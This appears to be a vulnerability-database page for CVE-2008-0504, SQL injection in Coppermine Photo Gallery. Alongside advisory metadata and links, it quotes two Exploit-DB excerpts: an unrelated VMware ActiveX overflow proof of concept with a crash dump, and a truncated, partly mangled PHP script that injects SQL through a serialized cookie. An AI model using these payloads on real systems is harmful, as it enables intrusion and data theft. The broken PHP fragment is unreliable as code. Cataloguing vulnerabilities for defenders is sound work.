CVE-2008-0504
Published: 2008-01-31
Priority: P336 · medium · CVSS 2.0: 6.5
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
EXPLOIT
EPSS: 1.97% (77.9th percentile)
Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1.4.15 allow remote authenticated administrators to execute arbitrary SQL commands via the (1) albumid, (2) startpic, and (3) numpics parameters to util.php; and (4) cid_array parameter to reviewcom.php.
Affected
21 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coppermine-gallery | coppermine_photo_gallery | <= 1.4.14 | — |
GHSA
GHSA-vxmj-g28c-3v84: Coppermine Photo Gallery (CPG) 1
ghsa_unreviewed·2022-05-14·CVSS 6.5
CVE-2008-7186 [MEDIUM] GHSA-vxmj-g28c-3v84: Coppermine Photo Gallery (CPG) 1
Coppermine Photo Gallery (CPG) 1.4.14 does not restrict access to update.php, which allows remote attackers to obtain sensitive information such as the database table prefix via a direct request. NOTE: this might be leveraged for attacks against CVE-2008-0504.
GHSA
GHSA-jxr4-9m47-rq8f: Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1
ghsa_unreviewed·2022-05-01
CVE-2008-0504 [MEDIUM] CWE-89 GHSA-jxr4-9m47-rq8f: Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1
Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1.4.15 allow remote authenticated administrators to execute arbitrary SQL commands via the (1) albumid, (2) startpic, and (3) numpics parameters to util.php; and (4) cid_array parameter to reviewcom.php.
No detection rules found.
Exploit-DB
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
exploitdb·2008-09-01
CVE-2008-3892 VMware - COM API ActiveX Remote Buffer Overflow (PoC)
---
VMWare COM API Buffer Overflow
url: http://www.vmware.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.net
This was written for educational purposes. Use it at your own risk.
Author will not be responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
Sub tryMe
buff_1 = String (2000, "a")
buff_2 = String (2000, "b")
test.GuestInfo (buff_1) = buff_2
End Sub
Dump:
09:25:39.339 pid=0640 tid=0504 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [00000070])
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ??
Exploit-DB
Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection
exploitdb·2008-01-21
CVE-2008-0504 Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection
---
toHex($sql) . ', ' . $this->toHex('bazik') . ' LIMIT 1,1/*';
$b1 = 'bazik';
$a2 = $sql;
$b2 = 'bazik';
$arr = array($a1 => $b1, $a2 => $b2);
return $this->GLOBALS['prefix'] . '_albpw=' . rawurlencode(serialize($arr));
}
function toHex($str) {
for ($i=0; $i GLOBALS['host'], 80, $errno, $errstr, 30);
if(!$fp)
die("[-] Can't connect to " . $this->GLOBALS['host'] . " ...\n\n");
else {
fwrite($fp, $out);
while(!feof($fp))
$str .= fgets($fp, 128);
fclose($fp);
return $str;
}
}
function getCookiePrefix() {
$out = "HEAD " . $this->GLOBALS['path'] . "thumbnails.php?album=" . $this->GLOBALS['albumId'] . " HTTP/1.1\r\n";
$out .= "Host: " . $this->GLOBALS['host'] . "\r\n";
$out .= "Connection: Close\r\n\r\n";
preg_match_all('!Se
No writeups or analysis indexed.
http://coppermine-gallery.net/forum/index.php?topic=50103.0
http://secunia.com/advisories/28682
http://www.securityfocus.com/archive/1/487351/100/200/threaded
http://www.securityfocus.com/bid/27509
http://www.securitytracker.com/id?1019285
http://www.vupen.com/english/advisories/2008/0367
http://www.waraxe.us/advisory-66.html
Published: 2008-01-31